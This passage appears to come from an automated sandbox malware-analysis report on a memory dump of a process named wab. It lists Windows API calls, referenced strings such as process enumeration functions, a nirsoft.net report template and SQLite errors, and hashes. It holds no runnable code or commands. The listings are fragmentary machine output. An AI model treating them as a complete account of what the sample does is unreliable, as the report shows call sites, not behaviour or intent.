                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                    • API String ID: 667068680-3953557276
                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                    APIs
                    • GetDC.USER32(00000000), ref: 004121FF
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                    • SelectObject.GDI32(?,?), ref: 00412251
                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                    • SetCursor.USER32(00000000), ref: 004122BC
                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                    • memcpy.MSVCRT ref: 0041234D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                    • String ID:
                    • API String ID: 1700100422-0
                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004111E0
                    • GetWindowRect.USER32(?,?), ref: 004111F6
                    • GetWindowRect.USER32(?,?), ref: 0041120C
                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                    • GetWindowRect.USER32(00000000), ref: 0041124D
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                    • String ID:
                    • API String ID: 552707033-0
                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                    • memcpy.MSVCRT ref: 0040C11B
                    • strchr.MSVCRT ref: 0040C140
                    • strchr.MSVCRT ref: 0040C151
                    • _strlwr.MSVCRT ref: 0040C15F
                    • memset.MSVCRT ref: 0040C17A
                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                    • String ID: 4$h
                    • API String ID: 4066021378-1856150674
                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: %%0.%df
                    • API String ID: 3473751417-763548558
                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                    APIs
                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                    • KillTimer.USER32(?,00000041), ref: 004060D7
                    • KillTimer.USER32(?,00000041), ref: 004060E8
                    • GetTickCount.KERNEL32 ref: 0040610B
                    • GetParent.USER32(?), ref: 00406136
                    • SendMessageW.USER32(00000000), ref: 0040613D
                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                    • String ID: A
                    • API String ID: 2892645895-3554254475
                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                    APIs
                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                    • GetDesktopWindow.USER32 ref: 0040D9FD
                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                    • memset.MSVCRT ref: 0040DA23
                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                    • String ID: caption
                    • API String ID: 973020956-4135340389
                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                    APIs
                    Strings
                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf$wcscpy
                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                    • API String ID: 1283228442-2366825230
                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                    APIs
                    • wcschr.MSVCRT ref: 00413972
                    • wcscpy.MSVCRT ref: 00413982
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    • wcscpy.MSVCRT ref: 004139D1
                    • wcscat.MSVCRT ref: 004139DC
                    • memset.MSVCRT ref: 004139B8
                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                    • memset.MSVCRT ref: 00413A00
                    • memcpy.MSVCRT ref: 00413A1B
                    • wcscat.MSVCRT ref: 00413A27
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                    • String ID: \systemroot
                    • API String ID: 4173585201-1821301763
                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy
                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                    • API String ID: 1284135714-318151290
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                    • String ID: 0$6
                    • API String ID: 4066108131-3849865405
                    APIs
                    • memset.MSVCRT ref: 004082EF
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                    • memset.MSVCRT ref: 00408362
                    • memset.MSVCRT ref: 00408377
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiWide
                    • String ID:
                    • API String ID: 290601579-0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memchrmemset
                    • String ID: PD$PD
                    • API String ID: 1581201632-2312785699
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                    • GetDC.USER32(00000000), ref: 00409F6E
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                    • GetParent.USER32(?), ref: 00409FA5
                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                    • String ID:
                    • API String ID: 2163313125-0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$wcslen
                    • String ID:
                    • API String ID: 239872665-3916222277
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$_snwprintfmemset
                    • String ID: %s (%s)$YV@
                    • API String ID: 3979103747-598926743
                    APIs
                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                    • wcslen.MSVCRT ref: 0040A6B1
                    • wcscpy.MSVCRT ref: 0040A6C1
                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                    • wcscpy.MSVCRT ref: 0040A6DB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                    • String ID: Unknown Error$netmsg.dll
                    • API String ID: 2767993716-572158859
                    APIs
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 0040DAFB
                    • wcscpy.MSVCRT ref: 0040DB0B
                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfilewcscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 3176057301-2039793938
                    APIs
                    Strings
                    • unable to open database: %s, xrefs: 0042F84E
                    • too many attached databases - max %d, xrefs: 0042F64D
                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                    • database is already attached, xrefs: 0042F721
                    • database %s is already in use, xrefs: 0042F6C5
                    • cannot ATTACH database within transaction, xrefs: 0042F663
                    • out of memory, xrefs: 0042F865
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                    • API String ID: 1297977491-2001300268
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                    • memcpy.MSVCRT ref: 0040EB80
                    • memcpy.MSVCRT ref: 0040EB94
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                    • String ID: ($d
                    • API String ID: 1140211610-1915259565
                    APIs
                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                    • Sleep.KERNEL32(00000001), ref: 004178E9
                    • GetLastError.KERNEL32 ref: 004178FB
                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ErrorLastLockSleepUnlock
                    • String ID:
                    • API String ID: 3015003838-0
                    APIs
                    • memset.MSVCRT ref: 00407E44
                    • memset.MSVCRT ref: 00407E5B
                    • _mbscpy.MSVCRT ref: 00407E7E
                    • _mbscpy.MSVCRT ref: 00407ED7
                    • _mbscpy.MSVCRT ref: 00407EEE
                    • _mbscpy.MSVCRT ref: 00407F01
                    • wcscpy.MSVCRT ref: 00407F10
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                    • String ID:
                    • API String ID: 59245283-0
                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                    • GetLastError.KERNEL32 ref: 0041855C
                    • Sleep.KERNEL32(00000064), ref: 00418571
                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                    • GetLastError.KERNEL32 ref: 0041858E
                    • Sleep.KERNEL32(00000064), ref: 004185A3
                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                    • String ID:
                    • API String ID: 3467550082-0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                    • memset.MSVCRT ref: 00413ADC
                    • memset.MSVCRT ref: 00413AEC
                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                    • memset.MSVCRT ref: 00413BD7
                    • wcscpy.MSVCRT ref: 00413BF8
                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                    • String ID: 3A
                    • API String ID: 3300951397-293699754
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                    • wcslen.MSVCRT ref: 0040D1D3
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                    • String ID: strings
                    • API String ID: 3166385802-3030018805
                    APIs
                    • memset.MSVCRT ref: 00411AF6
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 00411B14
                    • wcscat.MSVCRT ref: 00411B2E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamememsetwcscatwcsrchr
                    • String ID: AE$.cfg$General$EA
                    • API String ID: 776488737-1622828088
                    APIs
                    • memset.MSVCRT ref: 0040D8BD
                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                    • memset.MSVCRT ref: 0040D906
                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                    • _wcsicmp.MSVCRT ref: 0040D92F
                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                    • String ID: sysdatetimepick32
                    • API String ID: 1028950076-4169760276
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: -journal$-wal
